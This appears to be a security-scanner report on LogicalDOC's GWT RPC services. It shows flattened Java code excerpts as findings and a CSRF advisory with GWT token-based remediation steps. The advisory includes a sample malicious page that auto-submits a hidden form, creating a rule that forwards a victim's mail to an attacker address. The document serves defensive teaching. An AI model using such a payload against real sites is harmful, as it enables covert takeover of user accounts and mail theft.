29 */30 public GUITenant load(long tenantId) throws ServerException;3132 /**33 * Changes the password of the administrator of the given tenant34 */35 public void changeAdminPassword(String password, String tenantName) throws ServerException;36 37 /**38 * Change session tenant39 */40 public GUITenant changeSessionTenant(long tenantId) throws ServerException;41}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/UpdateService.javaCode:

11 * 12 * @author Marco Meschieri - LogicalDOC13 * @since 7.3.114 */15@RemoteServiceRelativePath("update")16public interface UpdateService extends RemoteService {1718 /**19 * Check if the current installation has an update package available20 * 21 * @param userNo The current UserNo22 * @param currentRelease The actual release23 * @return List of informations about the available update package or null24 */25 public GUIParameter[] checkUpdate(String userNo, String currentRelease);2627 /**28 * Downloads an update package29 * 30 * @param userNo The current UserNo31 * @param id ID of the package to download32 * @param fileName Name of the package file33 * @param fileName Size of the package file expressed in MB34 * @return 0 if the download was successful35 */36 public void download(String userNo, String id, String fileName, int size);3738 /**39 * Confirms an update package40 * 41 * @param userNo The update file to confirm42 * @return The path of the update folder43 */44 public String confirm(String updateFileName) throws ServerException;4546 /**47 * Retrieves more informations from48 * 49 * @param updateFileName File name of the downloaded update package50 * @return ChangeLog and Install file contents51 */52 public String[] getNotes(String updateFileName) throws ServerException;5354 /**55 * Checks the status of the current download process56 * 57 * @return download status code and download progress58 */59 public int[] checkDownloadStatus();


59...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/frontend/client/services/WorkflowService.javaCode:

8/**9 * The client side stub for the Workflow Service. This service gives all needed10 * methods to handle workflows.11 */12@RemoteServiceRelativePath("workflow")13public interface WorkflowService extends RemoteService {14 /**15 * Loads a given workflow from the database16 */17 public GUIWorkflow get(String workflowName) throws ServerException;1819 /**20 * Deletes a given workflow21 */22 public void delete(String workflowName) throws ServerException;2324 /**25 * Deletes a given workflow instance26 */27 public void deleteInstance(String id) throws ServerException;2829 /**30 * Imports a new workflow schema.31 */32 public GUIWorkflow importSchema() throws ServerException;3334 /**35 * Creates or updates a workflow36 */37 public GUIWorkflow save(GUIWorkflow workflow) throws ServerException;3839 /**40 * Deploys a given workflow41 */42 public void deploy(GUIWorkflow workflow) throws ServerException;4344 /**45 * Undeploys a given workflow46 */47 public void undeploy(String workflowName) throws ServerException;4849 /**50 * Lists all the workflows on the database51 */52 public GUIWorkflow[] list() throws ServerException;5354 /**55 * Deletes a workflow trigger56 */56...

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/login/client/services/LoginService.javaCode:

8/**9 * The client side stub for the Login Service. This service gives all needed10 * methods to handle the login operations.11 */12@RemoteServiceRelativePath("login")13public interface LoginService extends RemoteService {


14 /**15 * Changes the password of a user16 * 17 * @param userId The user Identifier18 * @param oldPassword can be null19 * @param newPassword20 * @param notify If the new credentials need to be notified21 * @return 0 if all is ok, 1 if the password is incorrect, 2 if the new22 * password cannot be notified, otherwise a positive number grater23 * than 224 */25 public int changePassword(long userId, String oldPassword, String newPassword, boolean notify);2627 /**28 * Reset the password for the given email.29 * 30 * @param username the username for which reset password31 * @param emailAddress the email for which reset password32 * @param productName the application product name33 */34 public void resetPassword(String username, String emailAddress, String productName) throws ServerException;3536 public GUIUser getUser(String username);37}

File name: logicaldoc/logicaldoc-gui/src/main/java/com/logicaldoc/gui/setup/client/services/SetupService.javaCode:

9 * 10 * @author Marco Meschieri - Logical Objects11 * @since 6.012 */13@RemoteServiceRelativePath("setup")14public interface SetupService extends RemoteService {15 16 /**17 * Performs a system setup.18 * 19 * @param data The intallation data20 */21 public void setup(SetupInfo data);22}

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/AttributeSetServiceImpl.javaCode:

34 * Implementation of the AttributeSetService35 * 36 * @author Marco Meschieri - LogicalDOC37 * @since 7.538 */39public class AttributeSetServiceImpl extends RemoteServiceServlet implements AttributeSetService {4041 private static final long serialVersionUID = 1L;4243 private static Logger log = LoggerFactory.getLogger(AttributeSetServiceImpl.class);4445 @Override46 public void delete(long setId) throws ServerException {47 ServiceUtil.validateSession(getThreadLocalRequest());4849


AttributeSetDAO dao = (AttributeSetDAO) Context.get().getBean(AttributeSetDAO.class);50 dao.delete(setId);51 }5253 @Override54 public void saveOptions(long setId, String attribute, String[] values) throws ServerException {55 Session session = ServiceUtil.validateSession(getThreadLocalRequest());5657 AttributeOptionDAO dao = (AttributeOptionDAO) Context.get().getBean(AttributeOptionDAO.class);58 try {59 Map<String, AttributeOption> optionsMap = new HashMap<String, AttributeOption>();60 List<AttributeOption> options = dao.findBySetIdAndAttribute(setId, attribute);61 for (AttributeOption option : options)62 optionsMap.put(option.getValue(), option);6364 for (int i = 0; i < values.length; i++) {65 String value = values[i];66 AttributeOption option = optionsMap.get(value);67 if (option == null) {68 option = new AttributeOption(setId, attribute, value);69 } else {70 if (value.equals(option.getValue()) && option.getPosition() == i)71 continue;72 option.setValue(value);73 }7475 option.setPosition(i);76 dao.store(option);77 }78 } catch (Throwable t) {79 ServiceUtil.throwServerException(session, log, t);80 }81 }8282...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/ContactServiceImpl.javaCode:

27 * Implementation of the ContactService28 * 29 * @author Marco Meschieri - Logical Objects30 * @since 6.831 */32public class ContactServiceImpl extends RemoteServiceServlet implements ContactService {3334 private static final long serialVersionUID = 1L;3536 private static Logger log = LoggerFactory.getLogger(ContactServiceImpl.class);3738 @Override39 public void delete(long[] ids) throws ServerException {40 ServiceUtil.validateSession(getThreadLocalRequest());4142 try {43 ContactDAO dao = (ContactDAO) Context.get().getBean(ContactDAO.class);44 for (long id : ids) {45 dao.delete(id);46 }47 } catch (Throwable t) {48 log.error(t.getMessage(), t);49 }50 }5152 @Override


53 public void save(GUIContact contact) throws ServerException {54 ServiceUtil.validateSession(getThreadLocalRequest());55 try {56 ContactDAO dao = (ContactDAO) Context.get().getBean(ContactDAO.class);57 Contact con = dao.findById(contact.getId());58 if (con == null)59 con = new Contact();60 con.setEmail(contact.getEmail());61 con.setFirstName(contact.getFirstName());62 con.setLastName(contact.getLastName());63 con.setCompany(contact.getCompany());64 con.setAddress(contact.getAddress());65 con.setPhone(contact.getPhone());66 con.setMobile(contact.getMobile());67 con.setUserId(contact.getUserId());68 dao.store(con);69 } catch (Throwable t) {70 log.error(t.getMessage(), t);71 }72 }7374 @Override75 public GUIContact load(long id) throws ServerException {75...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/DocumentServiceImpl.javaCode:

90 * Implementation of the DocumentService91 * 92 * @author Matteo Caruso - Logical Objects93 * @since 6.094 */95public class DocumentServiceImpl extends RemoteServiceServlet implements DocumentService {9697 private static final long serialVersionUID = 1L;9899 private static Logger log = LoggerFactory.getLogger(DocumentServiceImpl.class);100101 @Override102 public void addBookmarks(long[] ids, int type) throws ServerException {103 Session session = ServiceUtil.validateSession(getThreadLocalRequest());104105 BookmarkDAO bookmarkDao = (BookmarkDAO) Context.get().getBean(BookmarkDAO.class);106 DocumentDAO dao = (DocumentDAO) Context.get().getBean(DocumentDAO.class);107 FolderDAO fdao = (FolderDAO) Context.get().getBean(FolderDAO.class);108109 int added = 0;110 int alreadyAdded = 0;111 for (long id : ids) {112 try {113 Bookmark bookmark = null;114 if (bookmarkDao.findByUserIdAndDocId(session.getUserId(), id).size() > 0) {115 // The bookmark already exists116 alreadyAdded++;117 } else {118 bookmark = new Bookmark();119 bookmark.setTenantId(session.getTenantId());120 bookmark.setType(type);121 bookmark.setTargetId(id);122 bookmark.setUserId(session.getUserId());123124 if (type == Bookmark.TYPE_DOCUMENT) {125 Document doc = dao.findById(id);126 bookmark.setTitle(doc.getTitle());127 bookmark.setFileType(doc.getType());


128 } else {129 Folder f = fdao.findById(id);130 bookmark.setTitle(f.getName());131 }132133 bookmarkDao.store(bookmark);134135 added++;136 }137 } catch (AccessControlException e) {138 ServiceUtil.throwServerException(session, log, e);138...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/FolderServiceImpl.javaCode:

46 * Implementation of the FolderService47 * 48 * @author Matteo Caruso - Logical Objects49 * @since 6.050 */51public class FolderServiceImpl extends RemoteServiceServlet implements FolderService {5253 private static final long serialVersionUID = 1L;5455 private static Logger log = LoggerFactory.getLogger(FolderServiceImpl.class);5657 @Override58 public GUIFolder inheritRights(long folderId, long rightsFolderId) throws ServerException {59 Session session = ServiceUtil.validateSession(getThreadLocalRequest());6061 try {62 FolderDAO fdao = (FolderDAO) Context.get().getBean(FolderDAO.class);6364 /*65 * Just apply the current security settings to the whole subtree66 */67 FolderHistory transaction = new FolderHistory();68 transaction.setSession(session);6970 if (!fdao.updateSecurityRef(folderId, rightsFolderId, transaction))71 throw new Exception("Error updating the database");7273 return getFolder(session, folderId);74 } catch (Throwable t) {75 ServiceUtil.throwServerException(session, log, t);76 }77 return null;78 }7980 @Override81 public void applyRights(GUIFolder folder, boolean subtree) throws ServerException {82 Session session = ServiceUtil.validateSession(getThreadLocalRequest());8384 try {85 FolderDAO fdao = (FolderDAO) Context.get().getBean(FolderDAO.class);86 Folder f = fdao.findById(folder.getId());87 fdao.initialize(f);8889 if (subtree) {90 /*91 * Just apply the current security settings to the whole subtree92 */93 FolderHistory history = new FolderHistory();94 history.setSession(session);94...


File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/InfoServiceImpl.javaCode:

40 * Implementation of the InfoService41 * 42 * @author Marco Meschieri - Logical Objects43 * @since 6.044 */45public class InfoServiceImpl extends RemoteServiceServlet implements InfoService {4647 private static Logger log = LoggerFactory.getLogger(InfoServiceImpl.class);4849 private static final long serialVersionUID = 1L;5051 @Override52 public GUIInfo getInfo(String locale, String tenantName) {53 ContextProperties config = Context.get().getProperties();5455 GUIInfo info = null;56 try {57 info = getInfo(tenantName);58 info.setBundle(getBundle(locale, tenantName));5960 Locale withLocale = LocaleUtil.toLocale(locale);61 ArrayList<GUIValue> supportedLanguages = new ArrayList<GUIValue>();6263 List<String> installedLocales = I18N.getLocales();64 for (String loc : installedLocales) {65 if ("enabled".equals(config.getProperty(tenantName + ".lang." + loc + ".gui"))) {66 Locale lc = LocaleUtil.toLocale(loc);67 GUIValue l = new GUIValue();68 l.setCode(loc);69 l.setValue(lc.getDisplayName(withLocale));70 supportedLanguages.add(l);71 }72 }7374 info.setSupportedGUILanguages(supportedLanguages.toArray(new GUIValue[0]));7576 LanguageManager manager = LanguageManager.getInstance();77 Collection<Language> languages = manager.getActiveLanguages(tenantName);78 supportedLanguages.clear();79 for (Language language : languages) {80 Locale lc = language.getLocale();81 GUIValue l = new GUIValue();82 l.setCode(lc.toString());83 l.setValue(lc.getDisplayName(withLocale));84 supportedLanguages.add(l);85 }86 info.setSupportedLanguages(supportedLanguages.toArray(new GUIValue[0]));8788 List<GUIMessage> messages = new ArrayList<GUIMessage>();88...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/LoginServiceImpl.javaCode:

32 * Implementation of the <code>LoginService</code>33 * 34 * @author Marco Meschieri - LogicalDOC35 * @since 7.536 */37public class LoginServiceImpl extends RemoteServiceServlet implements LoginService {3839 private static final long serialVersionUID = 1L;40


41 private static Logger log = LoggerFactory.getLogger(InfoServiceImpl.class);4243 @Override44 public int changePassword(long userId, String oldPassword, String newPassword, boolean notify) {45 SecurityServiceImpl ser = new SecurityServiceImpl();46 return ser.changePassword(userId, oldPassword, newPassword, notify);47 }4849 @Override50 public GUIUser getUser(String username) {51 try {52 UserDAO userDao = (UserDAO) Context.get().getBean(UserDAO.class);53 TenantDAO tenantDao = (TenantDAO) Context.get().getBean(TenantDAO.class);5455 User user = userDao.findByUsername(username);56 if (user == null)57 return null;5859 // Get just a few informations needed by the login60 GUIUser usr = new GUIUser();61 usr.setId(user.getId());62 usr.setTenantId(user.getTenantId());63 usr.setPasswordExpires(user.getPasswordExpires() == 1);64 usr.setPasswordExpired(user.getPasswordExpired() == 1);6566 Tenant tenant = tenantDao.findById(user.getTenantId());6768 ContextProperties config = Context.get().getProperties();69 usr.setPasswordMinLenght(Integer.parseInt(config.getProperty(tenant.getName() + ".password.size")));7071 return usr;72 } catch (Throwable t) {73 log.error(t.getMessage(), t);74 return null;75 }76 }7778 @Override79 public void resetPassword(String username, String emailAddress, String productName) throws ServerException {80 UserDAO userDao = (UserDAO) Context.get().getBean(UserDAO.class);80...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/MessageServiceImpl.javaCode:

31 * Implementation of the MessageService32 * 33 * @author Marco Meschieri - Logical Objects34 * @since 6.035 */36public class MessageServiceImpl extends RemoteServiceServlet implements MessageService {3738 private static Logger log = LoggerFactory.getLogger(MessageServiceImpl.class);3940 private static final long serialVersionUID = 1L;4142 @Override43 public void delete(long[] ids) throws ServerException {44 ServiceUtil.validateSession(getThreadLocalRequest());45 Context context = Context.get();46 SystemMessageDAO dao = (SystemMessageDAO) context.getBean(SystemMessageDAO.class);47 for (long id : ids) {48 dao.delete(id);49 }50 }


5152 @Override53 public GUIMessage getMessage(long messageId, boolean markAsRead) throws ServerException {54 Session session = ServiceUtil.validateSession(getThreadLocalRequest());5556 try {57 Context context = Context.get();58 SystemMessageDAO dao = (SystemMessageDAO) context.getBean(SystemMessageDAO.class);59 SystemMessage message = dao.findById(messageId);60 dao.initialize(message);6162 GUIMessage m = new GUIMessage();63 m.setId(message.getId());64 m.setSubject(message.getSubject());65 m.setConfirmation(message.getConfirmation() == 1);66 m.setMessage(message.getMessageText());67 m.setValidity(message.getDateScope());6869 // If the case mark the message as read70 if (!message.wasReadBy(session.getUsername())) {71 Recipient rec = message.getRecipient(session.getUsername());72 if (rec != null) {73 rec.setRead(1);74 dao.store(message);75 }7677 // If required a notification message must be sent to the sender78 if (message.getConfirmation() == 1) {79 Date date = new Date();79...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchEngineServiceImpl.javaCode:

26 * Implementation of the SearchEngineService27 * 28 * @author Matteo Caruso - Logical Objects29 * @since 6.030 */31public class SearchEngineServiceImpl extends RemoteServiceServlet implements SearchEngineService {3233 private static final long serialVersionUID = 1L;3435 private static Logger log = LoggerFactory.getLogger(SearchEngineServiceImpl.class);3637 @Override38 public GUISearchEngine getInfo() throws ServerException {39 Session session = ServiceUtil.validateSession(getThreadLocalRequest());4041 try {42 GUISearchEngine searchEngine = new GUISearchEngine();4344 SearchEngine indexer = (SearchEngine) Context.get().getBean(SearchEngine.class);45 searchEngine.setLocked(indexer.isLocked());46 searchEngine.setEntries(indexer.getCount());4748 ContextProperties conf = Context.get().getProperties();49 searchEngine.setExcludePatters(conf.getProperty(session.getTenantName() + ".index.excludes"));50 searchEngine.setIncludePatters(conf.getProperty(session.getTenantName() + ".index.includes"));51 searchEngine.setDir(conf.getProperty("index.dir"));52 searchEngine.setSubwords("true".equals(conf.getProperty("index.subwords")));


5354 if (StringUtils.isNotEmpty(conf.getProperty("index.batch")))55 searchEngine.setBatch(new Integer(conf.getProperty("index.batch")));56 else57 searchEngine.setBatch(0);5859 if (StringUtils.isNotEmpty(conf.getProperty("parser.timeout")))60 searchEngine.setParsingTimeout(new Integer(conf.getProperty("parser.timeout")));61 else62 searchEngine.setParsingTimeout(0);6364 if (StringUtils.isNotEmpty(conf.getProperty("index.maxtext")))65 searchEngine.setMaxText(new Integer(conf.getProperty("index.maxtext")));66 else67 searchEngine.setMaxText(0);6869 // Populate the list of supported languages70 searchEngine.setLanguages("");71 LanguageManager lm = LanguageManager.getInstance();72 List<String> langs = lm.getLanguagesAsString(session.getTenantName());73 for (String lang : langs) {74 searchEngine.setLanguages(searchEngine.getLanguages() + "," + lang);74...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SearchServiceImpl.javaCode:

38 * Implementation of the SearchService39 * 40 * @author Marco Meschieri - Logical Objects41 * @since 6.042 */43public class SearchServiceImpl extends RemoteServiceServlet implements SearchService {4445 private static final long serialVersionUID = 1L;4647 protected static Logger log = LoggerFactory.getLogger(SearchServiceImpl.class);4849 @Override50 public GUIResult search(GUISearchOptions options) throws ServerException {51 Session session = ServiceUtil.validateSession(getThreadLocalRequest());52 options.setUserId(session.getUserId());5354 GUIResult result = new GUIResult();55 try {56 SearchOptions searchOptions = toSearchOptions(options);57 searchOptions.setTenantId(session.getTenantId());5859 if (searchOptions instanceof FulltextSearchOptions) {60 Locale exprLoc = LocaleUtil.toLocale(options.getExpressionLanguage());6162 Language lang = LanguageManager.getInstance().getLanguage(exprLoc);63 if (lang == null) {64 // Try to find another supported language65 exprLoc = LocaleUtil.toLocale(exprLoc.getLanguage());66 lang = LanguageManager.getInstance().getLanguage(exprLoc);6768 if (exprLoc != null)69 ((FulltextSearchOptions) searchOptions).setExpressionLanguage(exprLoc.getLanguage());70 }71 }7273 // Retrieve the search machinery74 Search search = Search.get(searchOptions);7576 try {


77 search.search();78 } catch (Exception e) {79 log.error(e.getMessage(), e);80 }8182 result.setSuggestion(search.getSuggestion());83 result.setEstimatedHits(search.getEstimatedHitsNumber());8485 List<Hit> hits = search.getHits();8686...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SecurityServiceImpl.javaCode:

72 * Implementation of the SecurityService73 * 74 * @author Marco Meschieri - Logical Objects75 * @since 6.076 */77public class SecurityServiceImpl extends RemoteServiceServlet implements SecurityService {7879 private static final long serialVersionUID = 1L;8081 private static Logger log = LoggerFactory.getLogger(SecurityServiceImpl.class);8283 public static GUITenant getTenant(long tenantId) {84 TenantDAO dao = (TenantDAO) Context.get().getBean(TenantDAO.class);85 Tenant tenant = dao.findById(tenantId);86 return fromTenant(tenant);87 }8889 public static GUITenant fromTenant(Tenant tenant) {90 if (tenant == null)91 return null;92 GUITenant ten = new GUITenant();93 ten.setId(tenant.getId());94 ten.setTenantId(tenant.getTenantId());95 ten.setCity(tenant.getCity());96 ten.setCountry(tenant.getCountry());97 ten.setDisplayName(tenant.getDisplayName());98 ten.setEmail(tenant.getEmail());99 ten.setName(tenant.getName());100 ten.setPostalCode(tenant.getPostalCode());101 ten.setState(tenant.getState());102 ten.setStreet(tenant.getStreet());103 ten.setTelephone(tenant.getTelephone());104 ten.setMaxRepoDocs(tenant.getMaxRepoDocs());105 ten.setMaxRepoSize(tenant.getMaxRepoSize());106 ten.setMaxSessions(tenant.getMaxSessions());107 ten.setMaxUsers(tenant.getMaxUsers());108 ten.setEnabled(tenant.getEnabled() == 1);109 ten.setExpire(tenant.getExpire());110111 return ten;112 }113114 public static GUITenant getTenant(String tenantName) {115 TenantDAO dao = (TenantDAO) Context.get().getBean(TenantDAO.class);116 Tenant tenant = dao.findByName(tenantName);117 return fromTenant(tenant);118 }119120 /**120...


File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SettingServiceImpl.javaCode:

34 * Implementation of the SettingService35 * 36 * @author Matteo Caruso - Logical Objects37 * @since 6.038 */39public class SettingServiceImpl extends RemoteServiceServlet implements SettingService {4041 private static final long serialVersionUID = 1L;4243 private static Logger log = LoggerFactory.getLogger(SettingServiceImpl.class);4445 @Override46 public GUIEmailSettings loadEmailSettings() throws ServerException {47 Session session = ServiceUtil.validateSession(getThreadLocalRequest());4849 GUIEmailSettings emailSettings = new GUIEmailSettings();50 try {51 ContextProperties conf = Context.get().getProperties();5253 emailSettings.setSmtpServer(conf.getProperty(session.getTenantName() + ".smtp.host"));54 emailSettings.setPort(Integer.parseInt(conf.getProperty(session.getTenantName() + ".smtp.port")));55 emailSettings56 .setUsername(!conf.getProperty(session.getTenantName() + ".smtp.username").trim().isEmpty() ? conf57 .getProperty(session.getTenantName() + ".smtp.username") : "");58 emailSettings.setPwd(!conf.getProperty(session.getTenantName() + ".smtp.password").trim().isEmpty() ? conf59 .getProperty(session.getTenantName() + ".smtp.password") : "");60 emailSettings.setConnSecurity(conf.getProperty(session.getTenantName() + ".smtp.connectionSecurity"));61 emailSettings62 .setSecureAuth("true".equals(conf.getProperty(session.getTenantName() + ".smtp.authEncripted")) ? true63 : false);64 emailSettings.setSenderEmail(conf.getProperty(session.getTenantName() + ".smtp.sender"));6566 log.info("Email settings data loaded successfully.");67 } catch (Exception e) {68 log.error("Exception loading Email settings data: " + e.getMessage(), e);69 }7071 return emailSettings;72 }7374 @Override75 public void saveEmailSettings(GUIEmailSettings settings) throws ServerException {76 Session session = ServiceUtil.validateSession(getThreadLocalRequest());7778 try {79 ContextProperties conf = Context.get().getProperties();8081 conf.setProperty(session.getTenantName() + ".smtp.host", settings.getSmtpServer());82 conf.setProperty(session.getTenantName() + ".smtp.port", Integer.toString(settings.getPort()));82...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SetupServiceImpl.javaCode:

28 * Implements the29 * 30 * @author Marco Meschieri - Logical Objects


31 * @since 6.032 */33public class SetupServiceImpl extends RemoteServiceServlet implements SetupService {3435 private static final long serialVersionUID = 1L;3637 protected static Logger log = LoggerFactory.getLogger(SetupServiceImpl.class);3839 @Override40 public void setup(SetupInfo data) {41 data.setRepositoryFolder(data.getRepositoryFolder().replaceAll("\\\\", "/"));42 File repoFolder = new File(data.getRepositoryFolder());43 log.warn("Initialize system using repository " + repoFolder);44 try {45 makeWorkingDir(repoFolder);46 createDB(data);47 writeRegConfig(data);4849 // Setup the correct logs folder50 try {51 ContextProperties pbean = new ContextProperties();52 LoggingConfigurator lconf = new LoggingConfigurator();53 lconf.setLogsRoot(pbean.getProperty("conf.logdir"));54 lconf.write();55 } catch (Throwable t) {56 log.error(t.getMessage(), t);57 throw new RuntimeException(t.getMessage(), t);58 }5960 // Reload the application context in order to reconnect DAOs to the61 // database62 Context.refresh();6364 } catch (Throwable caught) {65 caught.printStackTrace();66 log.error(caught.getMessage(), caught);67 throw new RuntimeException(caught.getMessage(), caught);68 }69 }7071 private void writeDBConfig(SetupInfo data) throws Exception {72 try {73 ContextProperties pbean = new ContextProperties();74 pbean.setProperty("jdbc.driver", data.getDbDriver() != null ? data.getDbDriver() : "");75 pbean.setProperty("jdbc.url", data.getDbUrl() != null ? data.getDbUrl() : "");76 pbean.setProperty("jdbc.username", data.getDbUsername() != null ? data.getDbUsername() : "");76...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/SystemServiceImpl.javaCode:

55 * Implementation of the SystemService56 * 57 * @author Matteo Caruso - Logical Objects58 * @since 6.059 */60public class SystemServiceImpl extends RemoteServiceServlet implements SystemService {6162 private static final long serialVersionUID = 1L;6364 private static int progress = 0;6566 private static Logger log = LoggerFactory.getLogger(SystemServiceImpl.class);6768 @Override69 public boolean disableTask(String taskName) throws ServerException {


70 ServiceUtil.validateSession(getThreadLocalRequest());7172 TaskManager manager = (TaskManager) Context.get().getBean(TaskManager.class);73 try {74 Task task = null;75 for (Task t : manager.getTasks()) {76 if (t.getName().equals(taskName)) {77 task = t;78 break;79 }80 }8182 task.getScheduling().setEnabled(false);83 task.getScheduling().save();8485 return true;86 } catch (Throwable e) {87 log.error(e.getMessage(), e);88 return false;89 }90 }9192 @Override93 public boolean enableTask(String taskName) throws ServerException {94 ServiceUtil.validateSession(getThreadLocalRequest());9596 TaskManager manager = (TaskManager) Context.get().getBean(TaskManager.class);97 try {98 Task task = null;99 for (Task t : manager.getTasks()) {100 if (t.getName().equals(taskName)) {101 task = t;102 break;103 }103...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/TagServiceImpl.javaCode:

23 * Implementation of the TagService24 * 25 * @author Marco Meschieri - Logical Objects26 * @since 6.027 */28public class TagServiceImpl extends RemoteServiceServlet implements TagService {2930 private static final long serialVersionUID = 1L;3132 protected static Logger log = LoggerFactory.getLogger(TagServiceImpl.class);3334 @Override35 public GUITag[] getTagCloud() throws ServerException {36 Session session = ServiceUtil.validateSession(getThreadLocalRequest());37 try {38 ArrayList<GUITag> ret = new ArrayList<GUITag>();39 DocumentDAO dao = (DocumentDAO) Context.get().getBean(DocumentDAO.class);40 List<TagCloud> list = dao.getTagCloud(session.getId());4142 for (TagCloud tagCloud : list) {43 GUITag c = new GUITag();44 c.setScale(tagCloud.getScale());45 c.setTag(tagCloud.getTag());46 c.setCount(tagCloud.getCount());47 ret.add(c);48 }4950 return ret.toArray(new GUITag[0]);51 } catch (Throwable t) {


52 return (GUITag[]) ServiceUtil.throwServerException(session, log, t);53 }54 }5556 @Override57 public void delete(String tag) {5859 }6061 @Override62 public void rename(String tag, String newTag) {6364 }6566 class TagCloudComparatorName implements Comparator<TagCloud> {67 public int compare(TagCloud tc0, TagCloud tc1) {68 return tc0.getTag().compareTo(tc1.getTag());69 }70 }7171...

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/service/TemplateServiceImpl.javaCode:

30 * Implementation of the TemplateService31 * 32 * @author Matteo Caruso - Logical Objects33 * @since 6.034 */35public class TemplateServiceImpl extends RemoteServiceServlet implements TemplateService {3637 private static final long serialVersionUID = 1L;3839 private static Logger log = LoggerFactory.getLogger(TemplateServiceImpl.class);4041 @Override42 public void delete(long templateId) throws ServerException {43 ServiceUtil.validateSession(getThreadLocalRequest());4445 TemplateDAO dao = (TemplateDAO) Context.get().getBean(TemplateDAO.class);46 dao.delete(templateId);47 }4849 @Override50 public GUITemplate save(GUITemplate template) throws ServerException {51 Session session = ServiceUtil.validateSession(getThreadLocalRequest());5253 TemplateDAO dao = (TemplateDAO) Context.get().getBean(TemplateDAO.class);54 try {55 Template templ;56 if (template.getId() != 0) {57 templ = dao.findById(template.getId());58 dao.initialize(templ);59 } else {60 templ = new Template();61 }6263 templ.setTenantId(session.getTenantId());64 templ.setName(template.getName());65 templ.setDescription(template.getDescription());66 templ.setReadonly(template.isReadonly() ? 1 : 0);67 templ.setType(template.getType());6869 Map<String, Attribute> attrs = new HashMap<String, Attribute>();70 if (template.getAttributes() != null && template.getAttributes().length > 0) {71 templ.getAttributes().clear();

72 for (GUIAttribute attribute : template.getAttributes()) {73 if (attribute != null) {74 Attribute att = new Attribute();75 att.setPosition(attribute.getPosition());76 att.setMandatory(attribute.isMandatory() ? 1 : 0);77 att.setType(attribute.getType());78 att.setLabel(attribute.getLabel());78...

Defending against Cross-site Request Forgery using GWT

HTTP does not have standard mechanisms for checking whether the user sent a request on purpose or not. This way, the malicious user can force the user's browser to send a request to a given server without the user knowing. This can be done by placing images, IFRAME elements and so on, on the webpage, the source of which is the address the malicious user wants.

As a result of loading this page, the user's browser tries to receive the external resource by sending a request to an address of the malicious user's choosing, by adding relevant cookies to it. This way, if the user was signed into a target service, the malicious user's request will be sent from the user's account.

Example

In order for a CSRF attack to succeed, the application doesn't need to have any particular vulnerabilities or mistakes. Any application that does not have the proper defenses is vulnerable.

Let's take a look at a webmail service. The following is a fragment of a page that deals with creating the rules for automatic incoming mail sorting:

html<form id="SendMailForm" action="http://mail/actions/add" method="POST"> <p>Action</p> <input type="radio" name="type" value="reply">Reply</input> <input type="radio" name="type" value="forward">Forward</input> <input type="radio" name="type" value="remove">Delete</input>

<p>Condition</p> <input type="text" name="condition"/>

<p>Target</p> <input type="text" name="target"/> <input type="submit" name="create"/></form>

The user forms a rule for sorting incoming mail and saves it on the server.

Let's suppose the user has stopped working with the mail client, and, without logging out, has gone to a page, prepared by the malicious user. By clicking on a link in an email, for example.

The malicious page includes the following code:

Xml<html><head> 

<script type="text/javascript"> window.onload = function(){ document.getElementById("CsrfForm").submit(); } </script>


</head><body> <form id="CsrfForm" action="http://mail/actions/add" method="POST"> <input type="hidden" name="type" value="forward" /> <input type="hidden" name="condition" value="any" /> <input type="hidden" name="target" value="[email protected]" /> </form></body></html>

The request, generated by sending the CsrfForm form will lead to creating a rule on the mail server. This rule will force the server to forward all incoming mail on the victim's account to [email protected]

Potential Consequences

CSRF attack consequences vary, and depend on the functionality of the requests that can be forged.

For example, forging requests from the administrator panel in a web application can lead to executing OS commands, as well as enabling/disabling application subsystems. As a result, the malicious user gains full access to the web application.

A common goal of a CSRF attack inside a corporate network (on intranet applications) is the modification of data involved in important business processes that the application automates. There was an incident, where a vulnerable application on the company intranet allowed a group of users to create shipping documents for company warehouse for whatever merchandise they wanted. This let the insider use the vulnerability to create passes for his accomplice, who would sign the merchandise out, without even working for the company.

Removal Recommendations•

[Necessary] Ensure that the application has no XSS vulnerabilities [1], since most CSRF countermeasures can be bypassed using those.

•For optimum protection, you have to define the most critical operations that are automated by the application. Force the user to send an additional confirmation for these operations. The confirmation should have an unpredictable parameter, which will protect from the attack.

•For functions that change the state of the web application, we recommend against using GET requests.

•For intranet applications, checking the HTTP header Referer should be enough. This header can ensure that the request came from the expected page. However, this is insufficient for Internet applications. Your clients can use proxy servers to access the restricted resources, and they can delete the Referer header in order to increase privacy [2]. In addition to that, Open Redirect [3] vulnerabilities render security, based on checking the Referer header pointless.

•The GWT framework has a special security mechanism that protects against CSRF attacks based on the Synchronizer Token Pattern [4] algorithm. The purpose of this algorithm is to generate a token for each HTTP session. In order to check whether the request was intentional or not, all you have to do is check the token value. In order to install this mechanism, you need to do the following [5]:

•On the server side:

•Add the XsrfTokenServiceServlet servlet to web.xml and link it to the value of session cookies:

xml<servlet> <servlet-name>xsrf</servlet-name> <servlet-class> com.google.gwt.user.server.rpc.XsrfTokenServiceServlet </servlet-class></servlet><servlet-mapping>


<servlet-name>xsrf</servlet-name> <url-pattern>/gwt/xsrf</url-pattern></servlet-mapping>...<context-param> <param-name>gwt.xsrf.session_cookie_name</param-name> <param-value>JSESSIONID</param-value></context-param>•

RPC servlets that need to be protected must inherit from the XsrfProtectedServiceServlet class:

